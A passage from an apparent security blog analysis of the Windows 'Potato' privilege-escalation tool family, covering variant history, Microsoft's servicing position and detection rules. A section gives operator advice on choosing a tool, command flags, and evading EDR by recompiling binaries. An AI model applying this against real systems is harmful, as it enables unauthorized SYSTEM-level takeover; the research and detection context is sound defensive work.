&lt;td&gt;(none yet)&lt;/td&gt;
&lt;td&gt;OXID-resolver hard-coding in Win10 1809 / Server 2019 [@forshaw-pz-2021]&lt;/td&gt;
&lt;td&gt;Only pre-1809 builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RoguePotato [@antonio-rogue]&lt;/td&gt;
&lt;td&gt;May 10, 2020&lt;/td&gt;
&lt;td&gt;Antonio Cocomazzi + Andrea Pierini&lt;/td&gt;
&lt;td&gt;DCOM activation through remote TCP-135 forwarder&lt;/td&gt;
&lt;td&gt;2019-2020 OXID-resolver hardening&lt;/td&gt;
&lt;td&gt;None (no CVE)&lt;/td&gt;
&lt;td&gt;Only pre-Phase-3 builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PrintSpoofer [@itm4n-printspoofer]&lt;/td&gt;
&lt;td&gt;Early May 2020&lt;/td&gt;
&lt;td&gt;Clément Labro&lt;/td&gt;
&lt;td&gt;Print Spooler RPC &lt;code&gt;RpcRemoteFindFirstPrinterChangeNotificationEx&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;All DCOM-side hardening (irrelevant)&lt;/td&gt;
&lt;td&gt;None (no CVE)&lt;/td&gt;
&lt;td&gt;Yes, when Spooler is running&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RemotePotato0 [@sentinellabs-relaying]&lt;/td&gt;
&lt;td&gt;Apr 2021&lt;/td&gt;
&lt;td&gt;Antonio Cocomazzi + Andrea Pierini&lt;/td&gt;
&lt;td&gt;Cross-session DCOM/RPC NTLM relay&lt;/td&gt;
&lt;td&gt;(defines a new threat surface)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;&quot;Won&apos;t Fix&quot;&lt;/strong&gt;; partial Oct 2022 RPC-to-LDAP mitigation&lt;/td&gt;
&lt;td&gt;Partially (primitive intact)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;JuicyPotatoNG [@antonio-juicyng; @decoder-juicyng]&lt;/td&gt;
&lt;td&gt;Sep 21, 2022&lt;/td&gt;
&lt;td&gt;Andrea Pierini + Antonio Cocomazzi&lt;/td&gt;
&lt;td&gt;Local-OXID trick + LogonUser NewCredentials&lt;/td&gt;
&lt;td&gt;CVE-2021-26414 Phase 1 and Phase 2&lt;/td&gt;
&lt;td&gt;None (no CVE)&lt;/td&gt;
&lt;td&gt;Only pre-Phase-3 builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GodPotato [@beichendream-god]&lt;/td&gt;
&lt;td&gt;Dec 23, 2022&lt;/td&gt;
&lt;td&gt;BeichenDream&lt;/td&gt;
&lt;td&gt;RPCSS OXID-handling defect (no resolver redirect)&lt;/td&gt;
&lt;td&gt;All three CVE-2021-26414 phases&lt;/td&gt;
&lt;td&gt;None (no CVE)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes -- the 2026 default&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LocalPotato / CVE-2023-21746 [@decoder-localpotato; @nvd-cve-2023-21746]&lt;/td&gt;
&lt;td&gt;Patched Jan 10, 2023&lt;/td&gt;
&lt;td&gt;Andrea Pierini + Antonio Cocomazzi&lt;/td&gt;
&lt;td&gt;NTLM Type-2 &quot;Reserved&quot; field context swap&lt;/td&gt;
&lt;td&gt;(orthogonal -- attacks LSASS)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CVE-2023-21746&lt;/strong&gt; (first local-Potato CVE)&lt;/td&gt;
&lt;td&gt;No -- patched&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SilverPotato / ADCSCoercePotato [@decoder-silverpotato; @troopers24]&lt;/td&gt;
&lt;td&gt;Apr 24, 2024&lt;/td&gt;
&lt;td&gt;Andrea Pierini + Antonio Cocomazzi&lt;/td&gt;
&lt;td&gt;Cross-session DCOM against &lt;code&gt;sppui&lt;/code&gt; AppID&lt;/td&gt;
&lt;td&gt;Post-RemotePotato0 partial mitigations&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Still in review by MSRC as of mid-2026&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes -- unpatched&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FakePotato / CVE-2024-38100 [@decoder-fakepotato; @nvd-cve-2024-38100]&lt;/td&gt;
&lt;td&gt;Disclosed Aug 2, 2024&lt;/td&gt;
&lt;td&gt;Andrea Pierini&lt;/td&gt;
&lt;td&gt;Cross-session DCOM against &lt;code&gt;ShellWindows&lt;/code&gt; AppID (ACL bug)&lt;/td&gt;
&lt;td&gt;(orthogonal)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CVE-2024-38100&lt;/strong&gt; in the July 2024 Patch Tuesday (KB5040434 for 1607/Server 2016; per-build KBs elsewhere)&lt;/td&gt;
&lt;td&gt;No -- patched&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Two CVEs in nine years of named-variant disclosures. One &quot;Won&apos;t Fix&quot; decision on a working Domain Admin escalation. Zero declarations of &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; or Distributed COM activation as a security boundary. The pattern is consistent across every column [@troopers24; @msrc-servicing-criteria].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Two CVEs in a decade, against a family with eleven named variants. The first CVE was for a piece of the &lt;em&gt;local NTLM protocol&lt;/em&gt; that is on the servicing-criteria list, not for the underlying &lt;code&gt;SeImpersonate&lt;/code&gt;-to-SYSTEM primitive. The second was for a &lt;em&gt;Distributed COM access-control list misconfiguration&lt;/em&gt;, not for cross-session activation as a class. Microsoft will assign CVEs to specific vehicles when forced. It will not declare the architectural primitive a security boundary [@nvd-cve-2023-21746; @nvd-cve-2024-38100; @troopers24].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;8. The 2026 Decision Surface&lt;/h2&gt;
&lt;p&gt;In May 2026, an operator with &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; on a default Windows 11 box has a small menu of working tools, plus three legacy variants that remain useful on unpatched fleets. The current toolkit:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Method&lt;/th&gt;
&lt;th&gt;Coercion vehicle&lt;/th&gt;
&lt;th&gt;OS coverage&lt;/th&gt;
&lt;th&gt;When to use it&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GodPotato&lt;/strong&gt; [@beichendream-god]&lt;/td&gt;
&lt;td&gt;RPCSS OXID defect&lt;/td&gt;
&lt;td&gt;Win 8 to Win 11; Server 2012 to Server 2025&lt;/td&gt;
&lt;td&gt;Default first try on any in-support Windows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SweetPotato&lt;/strong&gt; [@ccob-sweet]&lt;/td&gt;
&lt;td&gt;Selectable: PrintSpoofer (default), DCOM, EfsRpc, WinRM&lt;/td&gt;
&lt;td&gt;Win 7+ depending on selected mode&lt;/td&gt;
&lt;td&gt;When GodPotato&apos;s binary signature is blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SharpEfsPotato&lt;/strong&gt; [@bugch3ck-efs]&lt;/td&gt;
&lt;td&gt;EFS RPC (&lt;code&gt;EfsRpcOpenFileRaw&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Server 2019+, Win 10/11 with EFS RPC enabled&lt;/td&gt;
&lt;td&gt;DCOM locked down &lt;em&gt;and&lt;/em&gt; Spooler disabled&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;PrintSpoofer&lt;/strong&gt; [@itm4n-printspoofer]&lt;/td&gt;
&lt;td&gt;Print Spooler RPC&lt;/td&gt;
&lt;td&gt;Any host with Spooler running&lt;/td&gt;
&lt;td&gt;The lowest-noise option on Spooler-enabled hosts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;JuicyPotatoNG&lt;/strong&gt; [@antonio-juicyng]&lt;/td&gt;
&lt;td&gt;Local-OXID + legacy CLSID&lt;/td&gt;
&lt;td&gt;Pre-Phase-3 DCOM hardening only&lt;/td&gt;
&lt;td&gt;Corporate fleets with delayed CVE-2021-26414 rollout&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;RoguePotato&lt;/strong&gt; [@antonio-rogue]&lt;/td&gt;
&lt;td&gt;Remote TCP-135 forwarder&lt;/td&gt;
&lt;td&gt;Pre-Phase-3 DCOM hardening&lt;/td&gt;
&lt;td&gt;Pre-2022 hardened-OXID-only systems with attacker remote infra&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SilverPotato&lt;/strong&gt; [@decoder-silverpotato]&lt;/td&gt;
&lt;td&gt;Cross-session DCOM against DC&lt;/td&gt;
&lt;td&gt;Default DCs with &lt;code&gt;Distributed COM Users&lt;/code&gt; or &lt;code&gt;Performance Log Users&lt;/code&gt; membership&lt;/td&gt;
&lt;td&gt;Domain-tier escalation -- the only currently-unpatched cross-session variant&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Plus three legacy variants worth knowing about: JuicyPotato on pre-1809 builds, RottenPotato on Server 2008 R2 / Windows 7 ESU-eligible builds, and HotPotato as the canonical naming origin and the source of the family&apos;s &quot;documented Win32 calls&quot; framing [@ohpe-juicy; @foxglove-rotten-repo; @foxglove-hotpotato]. Embedded Windows builds (Windows 10 IoT LTSC 2019, some industrial controllers, ATM images) frequently fall behind the OXID-resolver mitigation and remain JuicyPotato-vulnerable through 2026.&lt;/p&gt;

SharpEfsPotato&apos;s canonical repository is `github.com/bugch3ck/SharpEfsPotato` [@bugch3ck-efs]. A widely shared `ly4k/SharpEfsPotato` fork exists and is referenced in some red-team writeups, but the upstream is the `bugch3ck` repo per the README&apos;s own credit chain (&quot;Built from SweetPotato by @\_EthicalChaos\_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0&quot;) [@bugch3ck-efs]. Operators citing the `ly4k` URL are pointing at a fork.
&lt;p&gt;Every one of these tools has a Microsoft mitigation in its history. None of those mitigations closed the family. The next section asks what mitigation could.&lt;/p&gt;
&lt;h2&gt;9. What Would It Take To Close the Family?&lt;/h2&gt;
&lt;p&gt;A counterfactual sharpens the question. Suppose Microsoft decided in 2026 that the family must end. Three closure options exist, and each carries a compatibility cost.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Closure option&lt;/th&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;th&gt;Compatibility cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1. Declare &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; a security boundary&lt;/td&gt;
&lt;td&gt;Revoke the privilege from default service accounts (IIS app pools, SQL Server, BITS, Task Scheduler, the Spooler)&lt;/td&gt;
&lt;td&gt;Operationally prohibitive: thousands of third-party services depend on the default grant&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2. Declare Distributed COM activation a security boundary&lt;/td&gt;
&lt;td&gt;Validate the activator&apos;s identity against the activated CLSID&apos;s registered identity on every activation&lt;/td&gt;
&lt;td&gt;Breaks 25 years of legacy Distributed COM applications written between 1996 and 2021 [@ms-dcom-spec]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3. Deprecate &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; as a Win32 primitive&lt;/td&gt;
&lt;td&gt;Remove the call from &lt;code&gt;namedpipeapi.h&lt;/code&gt; or gate it behind a Trustlet validation&lt;/td&gt;
&lt;td&gt;Breaks parts of CSRSS, the console subsystem, and LSASS itself; no deprecation notice exists in the API reference as of mid-2026 [@ms-impersonate-api]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The CVE-2021-26414 hardening creeps toward option 2 for &lt;em&gt;remote&lt;/em&gt; Distributed COM but explicitly does not for &lt;em&gt;local&lt;/em&gt; Distributed COM [@ms-kb5004442]. The &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Adminless direction&lt;/a&gt; in Windows 11 24H2 -- Microsoft&apos;s &quot;Administrator protection&quot; platform feature, currently a preview shipped first via Windows Insider builds and not yet generally available [@ms-administrator-protection] -- introduces a per-application admin-elevation gate, but operates &lt;em&gt;above&lt;/em&gt; the SYSTEM-impersonation primitive, not below it. &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; isolates LSASS secrets in a &lt;a href=&quot;https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Virtualization-Based Security Trustlet&lt;/a&gt; -- which protects NTLM hashes from extraction but does not gate &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; or &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; [@ms-credential-guard]. &lt;a href=&quot;https://paragmali.com/blog/living-off-the-land-on-windows-the-lolbin-catalog-and-the-st/&quot; rel=&quot;noopener&quot;&gt;Smart App Control&lt;/a&gt; restricts arbitrary binary execution but does not block in-process exploitation by a SYSTEM-running service [@ms-smart-app-control].&lt;/p&gt;
&lt;p&gt;The lower bound on attack cost is therefore O(1) per invocation, and it stays O(1) as long as the servicing-criteria carve-out holds. No combination of currently-shipping mitigations moves it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Potato family is a fixed point of the current Windows architecture. Every closure option carries a compatibility cost that no currently-announced Microsoft release accepts. Until the MSRC Windows Security Servicing Criteria changes the position on &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; and Distributed COM activation, the family&apos;s lower attack cost is O(1) and no servicing patch can move it [@msrc-servicing-criteria; @troopers24].&lt;/p&gt;
&lt;/blockquote&gt;

The claim is empirical, not formal. A &quot;fixed point&quot; in the algorithmic sense is a value where a function returns its own input. For the Potato family the analogue is: every Microsoft mitigation that does not change the servicing-criteria document returns a family that is still alive. The fixed-point status is consistent with eleven variants over nine years of named-variant disclosures (HotPotato January 2016 -&amp;gt; FakePotato August 2024) against three named hardening waves. It would be invalidated by a major-version Windows release that explicitly revoked the default `SeImpersonatePrivilege` grant on service accounts. No such release is on the public roadmap as of May 2026 [@msrc-servicing-criteria].
&lt;h2&gt;10. Open Problems&lt;/h2&gt;
&lt;p&gt;Five questions sit at the research frontier in 2026.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The next coercion vehicle.&lt;/strong&gt; Each Potato variant is one SYSTEM-context service with a callback-style API. As the family has matured, researchers have mapped a growing surface of candidates: EFS RPC (which SharpEfsPotato already weaponises [@bugch3ck-efs]), Print Spooler async RPC (MS-PAR), Windows Search remote protocol (MS-WSP), and Microsoft Distributed Transaction Coordinator RPC. The community-empirical conjecture, repeated across Troopers 24 [@troopers24] and the Compass Security retrospective [@compass-three-headed], is that any SYSTEM-context Windows service with a callback-style API becomes a Potato vehicle within roughly eighteen months of operational need.&lt;/p&gt;
&lt;p&gt;The &quot;eighteen-month vehicle cadence&quot; is an informal community claim, not a measured statistic. It originates in the Troopers 24 retrospective by Pierini and Cocomazzi [@troopers24] and is reinforced by the Compass Security follow-on documenting how the SilverPotato chain was productised within months of Pierini&apos;s February 2024 ADCS-server post [@decoder-adcs-server; @compass-three-headed]. The number should be read as a rule of thumb, not a benchmark.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Linux and Windows Subsystem for Linux extension.&lt;/strong&gt; No Linux analogue of &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; exists. There are partial precedents in the impacket cross-protocol relay work, but no Potato-class primitive that produces a SYSTEM token on a Linux host. Open.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Will defence-in-depth combine to close the family without ever declaring a new boundary?&lt;/strong&gt; Microsoft has shipped Credential Guard [@ms-credential-guard], &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;Hypervisor-Protected Code Integrity&lt;/a&gt; [@ms-hvci], Smart App Control [@ms-smart-app-control], and the experimental Administrator-protection direction in Windows 11 24H2 [@ms-administrator-protection]. Each changes the runtime trust model in some way. No combination of currently-shipping technologies closes the family as of May 2026 -- the Potato primitives live below the layer those technologies operate on [@troopers24; @compass-three-headed].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A defensive detection primitive that catches every variant.&lt;/strong&gt; The unifying invariant is &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; being called from a thread that holds &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; against a named pipe that has just received a SYSTEM-context authentication originating from a service the calling process did not initiate. Per-variant detection rules exist for each named tool (GodPotato, PrintSpoofer, JuicyPotato). A generalising rule has not been published [@ms-impersonate-api]. The informal community position is that the family is &lt;em&gt;non-detectable as a class&lt;/em&gt; because the primitive is in the legitimate hot path of nearly every Windows service.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MSRC servicing-criteria position on cross-session Distributed COM activation.&lt;/strong&gt; LocalPotato (CVE-2023-21746) received a CVE for a piece of the local NTLM protocol [@nvd-cve-2023-21746]. FakePotato (CVE-2024-38100) received a CVE for an access-control list misconfiguration on the &lt;code&gt;ShellWindows&lt;/code&gt; AppID [@nvd-cve-2024-38100]. SilverPotato is still unpatched [@decoder-silverpotato; @troopers24]. The boundary that distinguishes these three is unclear: why was the &lt;code&gt;ShellWindows&lt;/code&gt; cross-session activation patched while the &lt;code&gt;sppui&lt;/code&gt; cross-session activation has not been? The answer determines the next decade of the family. The defensible reading is that Microsoft will service variants that look like permission misconfigurations on a single AppID but not the underlying cross-session Distributed COM activation primitive itself.&lt;/p&gt;
&lt;h2&gt;11. How to Use a Potato in 2026&lt;/h2&gt;
&lt;p&gt;The practitioner question is operational. Given a foothold and a goal, which Potato variant does the job? The decision tree below walks through the path researchers settle into on red-team engagements.&lt;/p&gt;

flowchart TD
    A[Target OS in support?] --&amp;gt;|&quot;No&quot;| Z1[JuicyPotato on pre-2020 builds, or RoguePotato on 2020-2022 builds]
    A --&amp;gt;|&quot;Yes&quot;| B[Operator privilege?]
    B --&amp;gt;|&quot;SeImpersonate or SeAssignPrimaryToken&quot;| C[Spooler running?]
    B --&amp;gt;|&quot;Standard user, cross-session victim present&quot;| Z2[FakePotato technique illustrative -- patched in KB5040434]
    B --&amp;gt;|&quot;DCOM-group member on a DC&quot;| Z3[SilverPotato with ntlmrelayx to AD CS]
    C --&amp;gt;|&quot;Yes&quot;| D[SweetPotato -e PrintSpoofer default]
    C --&amp;gt;|&quot;No&quot;| E[EFS RPC reachable?]
    E --&amp;gt;|&quot;Yes&quot;| F[SharpEfsPotato]
    E --&amp;gt;|&quot;No&quot;| G[GodPotato as fallback]
&lt;p&gt;The first-try heuristic is short. &lt;strong&gt;GodPotato first&lt;/strong&gt;, because it is the single binary that works on every in-support Windows release [@beichendream-god]. If the GodPotato binary signature is blocked by Endpoint Detection and Response, &lt;strong&gt;SweetPotato with &lt;code&gt;-e PrintSpoofer&lt;/code&gt;&lt;/strong&gt; (or &lt;code&gt;-e EfsRpc&lt;/code&gt; on a Domain Controller where Spooler is off) [@ccob-sweet]. If both are blocked, &lt;strong&gt;SharpEfsPotato&lt;/strong&gt; as the lower-public-exposure third choice [@bugch3ck-efs]. For pre-2023 unpatched fleets, &lt;strong&gt;JuicyPotatoNG&lt;/strong&gt; during the Phase-2 hardening window and &lt;strong&gt;JuicyPotato&lt;/strong&gt; on pre-1809 builds [@antonio-juicyng; @ohpe-juicy]. For domain escalation against a DC, &lt;strong&gt;SilverPotato&lt;/strong&gt; with the Compass Security KrbRelay modifications [@decoder-silverpotato; @compass-three-headed].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; GodPotato. If signature-blocked, SweetPotato with &lt;code&gt;-e PrintSpoofer&lt;/code&gt;. If both blocked, SharpEfsPotato. The rest of the family is for situations the first three do not cover (legacy fleets, DC escalation, technique illustration of patched variants) [@beichendream-god; @ccob-sweet; @bugch3ck-efs].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Several implementation pitfalls catch new operators. The named-pipe path that GodPotato uses (&lt;code&gt;\pipe\&amp;lt;token&amp;gt;\pipe\epmapper&lt;/code&gt;) is widely signatured by EDR vendors -- see the detection-engineering Spoiler below for the specific Sigma and Elastic rules [@sigma-potato-hktl; @elastic-rogue-pipe] -- and recompiling from source with a different pipe template is the standard countermeasure. A token &lt;em&gt;holding&lt;/em&gt; &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; does not necessarily &lt;em&gt;enable&lt;/em&gt; it -- explicit &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt; with &lt;code&gt;SE_PRIVILEGE_ENABLED&lt;/code&gt; is required, and custom adaptations frequently miss the step [@ms-adjusttokenprivileges]. SweetPotato&apos;s default &lt;code&gt;-e PrintSpoofer&lt;/code&gt; mode fails silently on a Domain Controller where Spooler is disabled per the PrintNightmare aftermath; the correct DC default is GodPotato or SharpEfsPotato. RoguePotato&apos;s outbound TCP 135 to attacker infrastructure is blocked by default in most enterprise networks. FakePotato and SilverPotato both require the victim identity to be actively logged in, since both depend on a live cross-session activation surface [@itm4n-printspoofer; @antonio-rogue; @decoder-silverpotato; @decoder-fakepotato].&lt;/p&gt;

If you defend Windows rather than attack it, the detection target is the conjunction of (a) named-pipe creation by an IIS or SQL or service account, (b) a SYSTEM-context process connecting to that pipe shortly after, and (c) `CreateProcessWithToken` from the original service-account process. None of the three events alone is anomalous. The conjunction is. Sysmon Event ID 1 (Process Create) paired with Event IDs 17 and 18 (PipeEvent: Pipe Created and Pipe Connected) plus ETW providers `Microsoft-Windows-COM` and `Microsoft-Windows-RPC` cover the activation-plus-pipe half [@ms-sysmon]; Sysmon Event ID 10 (ProcessAccess) on `lsass.exe` from the originating service account is the third pillar that surfaces the impersonation handle acquisition [@ms-sysmon]. Per-variant signatures are published as Sigma rules for the public LocalPotato, CoercedPotato, JuicyPotato, RottenPotato, and EfsPotato binaries [@sigma-potato-hktl; @sigma-localpotato], and Elastic&apos;s `privilege_escalation_via_rogue_named_pipe` rule fires on the PrintSpoofer / EfsPotato pipe-path pattern that GodPotato shares [@elastic-rogue-pipe]. A class-generalising rule that fires on the *primitive* (rather than per-binary) has not been published.
&lt;p&gt;Library and framework support follows the same shape as any post-exploitation primitive (the picture here is community-empirical, drawn from public BOF and module repositories rather than vendor reference architectures). Cobalt Strike Beacon Object Files wrapping GodPotato, PrintSpoofer, and SweetPotato are widely shared in the red-team community -- &lt;code&gt;incursi0n/GodPotatoBOF&lt;/code&gt; is one publicly published example that integrates with &lt;code&gt;BeaconUseToken()&lt;/code&gt; for in-Beacon SYSTEM-token application [@godpotato-bof] -- and the same wrappers load into Sliver. PowerShell wrappers around PrintSpoofer and JuicyPotato are integrated into Empire and Starkiller. The Metasploit &lt;code&gt;incognito&lt;/code&gt; post-exploitation module handles token impersonation as a primitive but does not wrap GodPotato directly [@msf-incognito]. The &lt;code&gt;impacket&lt;/code&gt; toolkit&apos;s &lt;code&gt;ntlmrelayx&lt;/code&gt; is the canonical relay engine for the tail of SilverPotato [@fortra-impacket], and OleViewDotNet -- Forshaw&apos;s tool -- is the discovery oracle that surfaced the &lt;code&gt;sppui&lt;/code&gt; and &lt;code&gt;ShellWindows&lt;/code&gt; AppIDs in the first place [@tyranid-oleview; @decoder-silverpotato; @decoder-fakepotato].&lt;/p&gt;
&lt;h2&gt;12. Frequently Asked Questions&lt;/h2&gt;


The name `Potato` originates with Stephen Breen&apos;s `foxglovesec/Potato` repository, created February 9, 2016, three weeks after the January 16, 2016 HotPotato blog post [@foxglove-potato-repo; @foxglove-hotpotato]. HotPotato is in the family because it pivots through the same `SeImpersonatePrivilege` plus named-pipe-impersonation primitive that every later variant exploits -- the vehicle is different (NetBIOS spoofing + WPAD + HTTP-to-SMB rather than Distributed COM) but the architectural carve-out is the same. See §4 for the bracketing-variant framing.


Because every Internet Information Services application-pool identity is granted the privilege by Windows default [@itm4n-printspoofer]. The grant exists for legitimate request-scoped impersonation -- it is the mechanism IIS uses to &quot;act as&quot; a calling user during authenticated request handling. The same default grant is the entire vulnerability surface for the Potato family. The Microsoft Security Servicing Criteria document treats the resulting `SeImpersonate`-to-SYSTEM transition as a safety boundary rather than a security boundary [@msrc-servicing-criteria; @troopers24].


No. CVE-2021-26414 hardening raises the *authentication* bar for Distributed COM clients to `RPC_C_AUTHN_LEVEL_PKT_INTEGRITY` and was fully enforced on March 14, 2023 in Phase 3 of the rollout [@ms-kb5004442]. It does not declare Distributed COM activation a security boundary. The proof is that GodPotato, which exploits an RPCSS OXID-handling defect rather than the activation authentication level, survives all three phases of the rollout and remains the practitioner default in 2026 [@beichendream-god].


Open question, with a defensible reading. LocalPotato attacks the local-user-to-local-user NTLM authentication context handle, which *is* on the servicing-criteria boundary list [@decoder-localpotato; @msrc-servicing-criteria]. RemotePotato0 attacks the `SeImpersonate`-to-SYSTEM transition via cross-session Distributed COM activation, which is *not* on the list and was therefore deemed an extension of the existing carve-out [@sentinellabs-relaying; @troopers24]. The two boundaries (local NTLM authentication context vs cross-session Distributed COM activation) are not equivalent in Microsoft&apos;s published servicing position.


Yes, on every patched Windows 11 / Server 2025 build as of this writing [@beichendream-god]. The RPCSS OXID-handling defect that GodPotato weaponises survives all three CVE-2021-26414 hardening phases [@ms-kb5004442; @compass-three-headed]. Microsoft has not assigned a CVE to the underlying defect, consistent with the servicing-criteria reading. Operationally, the only thing that changes between releases is the binary signature -- EDR vendors signature the public Apache-2.0 binary by hash, and operators recompile from source with cosmetic changes to evade [@beichendream-god].


Does not exist as of May 2026. If a 2025-2026 variant appears under an unfamiliar name -- French or otherwise -- verify against the canonical sources before citing: `decoder.cloud` for the Pierini and Cocomazzi line, `github.com/antonioCoco/*` for the Cocomazzi-authored repositories, `github.com/BeichenDream/*` for the BeichenDream line, and `itm4n.github.io` for the PrintSpoofer / SweetPotato line [@decoder-silverpotato; @antonio-rogue; @beichendream-god; @itm4n-printspoofer]. The Troopers 24 retrospective is the community-canonical lineage list as of the most recent consolidated talk [@troopers24].


Informally, no. The primitive `ImpersonateNamedPipeClient` is in the legitimate hot path of nearly every Windows service [@ms-impersonate-api]. Per-variant signatures exist for the public binaries (GodPotato, PrintSpoofer, JuicyPotato), and ETW providers `Microsoft-Windows-COM` and `Microsoft-Windows-RPC` surface the activation-and-RPC events that the Distributed COM variants generate. A class-generalising detection rule has not been published as of May 2026, and the false-positive rate on legitimate Windows services is high for any rule that fires on `ImpersonateNamedPipeClient` alone [@troopers24].

&lt;h2&gt;13. The Architectural Decision&lt;/h2&gt;
&lt;p&gt;Return to the opening scene. The same Internet Information Services web shell, the same &lt;code&gt;GodPotato.exe&lt;/code&gt;, the same ten-second SYSTEM shell. The reader now knows this is not a zero-day. It has been a single-binary operation for the better part of a decade. Every step is documented Win32 behaviour. And every step is permitted by Microsoft&apos;s published servicing position [@beichendream-god; @msrc-servicing-criteria; @troopers24].&lt;/p&gt;
&lt;p&gt;Nine years of named-variant disclosures. Eleven named variants. Three Microsoft hardening waves. Two CVEs -- LocalPotato in January 2023, FakePotato in July 2024 [@nvd-cve-2023-21746; @nvd-cve-2024-38100]. One &quot;Won&apos;t Fix&quot; decision on a working Domain Admin escalation in April 2021 [@sentinellabs-relaying]. Zero declarations of &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; or Distributed COM activation as a security boundary [@troopers24; @msrc-servicing-criteria]. The MSRC Windows Security Servicing Criteria document, the one whose boundary definition fetches in static HTML and whose enumeration table is JavaScript-rendered, is the through-line [@msrc-servicing-criteria]. Pierini and Cocomazzi say it bluntly in the Troopers 24 abstract:&lt;/p&gt;

Microsoft does not consider WSH a security boundary but rather a safety boundary; for this reason, many Potato exploits work (and have been working) on fully updated Windows systems. -- Pierini and Cocomazzi, Troopers 24 abstract [@troopers24]
&lt;p&gt;Microsoft will never fix the Potato class because fixing it requires declaring Distributed COM activation a security boundary, and they have spent twenty-five years insisting it is not. What would change that? A major-version Windows release that explicitly revokes the default &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; grant from service accounts -- a compatibility-breaking change that breaks IIS, SQL Server, BITS, the Spooler, and most third-party services that depend on the legitimate impersonation contract. No such release is on the public roadmap as of May 2026 [@msrc-servicing-criteria; @ms-kb5004442; @beichendream-god].&lt;/p&gt;
&lt;p&gt;Until then, the family is alive, and the ten-second SYSTEM shell is the default outcome of any IIS or service-account foothold on a fully-patched Windows machine. That is not the unintended consequence of an unpatched bug. That is the intended consequence of a published architectural decision.&lt;/p&gt;
&lt;blockquote&gt;
